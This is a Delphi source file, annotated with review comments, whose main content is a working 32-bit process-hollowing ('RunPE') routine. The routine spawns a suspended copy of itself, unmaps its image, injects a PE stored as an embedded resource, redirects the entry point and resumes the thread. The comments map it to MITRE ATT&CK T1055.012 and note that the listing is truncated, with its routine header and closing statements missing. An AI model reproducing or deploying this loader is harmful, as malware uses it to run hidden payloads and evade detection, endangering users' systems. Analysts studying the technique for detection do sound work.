unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,ntddk;
type
// Main form of the sample. It declares two buttons; only Button1 has an
// OnClick handler declared here (Button1Click, which closes the form).
TForm1 =
class(TForm)
Button1: TButton;
// No event handler for Button2 is declared in this class.
Button2: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
// Unit-level reference to the main form instance.
// NOTE(review): presumably assigned by the project file via
// Application.CreateForm - that code is not visible here; confirm.
var
Form1: TForm1;
implementation
{$R *.dfm}
function Protect(Characteristics: ULONG): ULONG;
// Translates a PE section's Characteristics flags into a PAGE_* memory
// protection constant. Only the top three bits are examined; after the
// shift, bit 0 is the execute flag ($20000000), bit 1 the read flag
// ($40000000) and bit 2 the write flag ($80000000).
begin
  case Characteristics shr 29 of
    0: Result := PAGE_NOACCESS;
    1: Result := PAGE_EXECUTE;
    2: Result := PAGE_READONLY;
    3: Result := PAGE_EXECUTE_READ;
    // Write without read has no PAGE_* constant of its own, so it is
    // mapped to the same value as read+write.
    4, 6: Result := PAGE_READWRITE;
    5, 7: Result := PAGE_EXECUTE_READWRITE;
  end;
end;
// Fixed-size array type used to index a PE section table through a typed
// pointer (the routine below casts ImageFirstSection(NtHeaders) to it).
// The declared bound is 96 entries; the routine does not compare
// NumberOfSections against this bound before indexing.
type
PImageSectionHeaders = ^TImageSectionHeaders;
TImageSectionHeaders =
array [0..95]
of TImageSectionHeader;
// Process-hollowing ("RunPE") routine, MITRE ATT&CK T1055.012: it starts a
// suspended second instance of this executable, unmaps that instance's main
// image, writes a PE taken from the 'Image'/'EXE' resource into the child,
// points the child's initial thread at the new entry point and resumes it.
// NOTE(review): no procedure/function header precedes this var section in the
// listing, and the closing `end;` of the outer `if CreateProcess ... begin`
// and of the routine body are missing before Button1Click - the listing looks
// truncated; confirm against the original source.
// As written this is 32-bit only: it uses Context.Ebx / Context.Eax and
// Cardinal() casts of pointers.
// API sequence visible to monitoring, all against the child's handles:
// CreateProcess(CREATE_SUSPENDED) -> GetThreadContext -> ReadProcessMemory ->
// ZwUnmapViewOfSection -> VirtualAllocEx -> WriteProcessMemory ->
// VirtualProtectEx -> SetThreadContext -> ResumeThread.
var
ProcessInfo: TProcessInformation;
StartupInfo: TStartupInfo;
Success: Boolean;
Context: TContext;
BaseAddress: Pointer;
BytesRead: DWORD;
Resource: Pointer;
NtHeaders: PImageNtHeaders;
BytesWritten: DWORD;
Sections: PImageSectionHeaders;
i: ULONG;
OldProtect: ULONG;
begin
FillChar(StartupInfo, SizeOf(TStartupInfo), 0);
StartupInfo.cb := SizeOf(TStartupInfo);
// The command line is ParamStr(0), i.e. this program's own path, so the
// child is a copy of the running executable created with CREATE_SUSPENDED.
if CreateProcess(
nil, PChar(ParamStr(0)),
nil,
nil, False, CREATE_SUSPENDED,
nil,
nil, StartupInfo, ProcessInfo)
then
begin
// Success stays False unless SetThreadContext succeeds at the very end; the
// finally block uses it to decide between terminating and resuming the child.
Success := False;
try
Context.ContextFlags := CONTEXT_INTEGER;
// Reads a pointer-sized value from the child at Ebx + 8 into BaseAddress.
// This relies on the 32-bit convention that a newly created thread's EBX
// holds the PEB address and PEB+8 is ImageBaseAddress.
// ZwUnmapViewOfSection then removes the child's original image mapping;
// `>= 0` is the NTSTATUS success test.
if GetThreadContext(ProcessInfo.hThread, Context)
and
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
@BaseAddress, SizeOf(BaseAddress), BytesRead)
and
(ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress) >= 0)
then
begin
// The replacement image is a resource named 'Image' of custom type 'EXE'
// looked up with module handle 0. The FindResource and LoadResource results
// are not checked individually; only the final pointer is tested.
// NOTE(review): the resource size is never queried (no SizeofResource call).
Resource := LockResource(
LoadResource(0, FindResource(0, '
Image', '
EXE')));
if Assigned(Resource)
then
begin
// Locates the NT headers through the DOS header's _lfanew field.
// NOTE(review): neither the DOS nor the NT signature is checked before the
// header fields are used.
NtHeaders := PImageNtHeaders(
Cardinal(Resource) + Cardinal(PImageDosHeader(Resource)._lfanew));
// Requests SizeOfImage bytes in the child at the image's own ImageBase,
// initially read/write. The call is qualified with the ntddk unit from the
// uses clause. There is no fallback if that address is unavailable: the
// Assigned check below fails and the child is terminated in the finally block.
BaseAddress := ntddk.VirtualAllocEx(ProcessInfo.hProcess,
Pointer(NtHeaders.OptionalHeader.ImageBase),
NtHeaders.OptionalHeader.SizeOfImage,
MEM_RESERVE
or MEM_COMMIT, PAGE_READWRITE);
// Copies the PE headers (SizeOfHeaders bytes) to the start of the allocation.
if Assigned(BaseAddress)
and WriteProcessMemory(ProcessInfo.hProcess,
BaseAddress, Resource, NtHeaders.OptionalHeader.SizeOfHeaders,
BytesWritten)
then
begin
Sections := PImageSectionHeaders(ImageFirstSection(NtHeaders));
// The loop body is the single if-statement below: each section's raw data
// is written at BaseAddress + VirtualAddress and, if that write succeeds,
// the region is re-protected according to the section flags via Protect().
// A failed section write is skipped silently and the VirtualProtectEx
// result is ignored; neither affects Success.
for i := 0
to NtHeaders.FileHeader.NumberOfSections - 1
do
if WriteProcessMemory(ProcessInfo.hProcess,
Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress),
Pointer(Cardinal(Resource) + Sections[i].PointerToRawData),
Sections[i].SizeOfRawData, BytesWritten)
then
ntddk.VirtualProtectEx(ProcessInfo.hProcess,
Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress),
Sections[i].Misc.VirtualSize,
Protect(Sections[i].Characteristics), OldProtect);
// After the loop: writes the new base address back to Ebx + 8 in the child
// (the location it was read from above).
if WriteProcessMemory(ProcessInfo.hProcess,
Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress),
BytesWritten)
then
begin
// Sets Eax in the saved context to the new image's entry point. This
// relies on the 32-bit convention that a suspended initial thread takes
// its start address from EAX.
Context.Eax := ULONG(BaseAddress) +
NtHeaders.OptionalHeader.AddressOfEntryPoint;
Success := SetThreadContext(ProcessInfo.hThread, Context);
end;
end;
end;
end;
finally
// Runs on every path, including exceptions raised inside the try block:
// the child is terminated unless the whole sequence succeeded, otherwise
// its thread is resumed. Both handles are closed in either case; the
// TerminateProcess / ResumeThread results are not checked.
if not Success
then
TerminateProcess(ProcessInfo.hProcess, 0)
else
ResumeThread(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
end;
procedure TForm1.Button1Click(Sender: TObject);
// OnClick handler for Button1: closes this form. Sender is not used.
begin
  Self.Close;
end;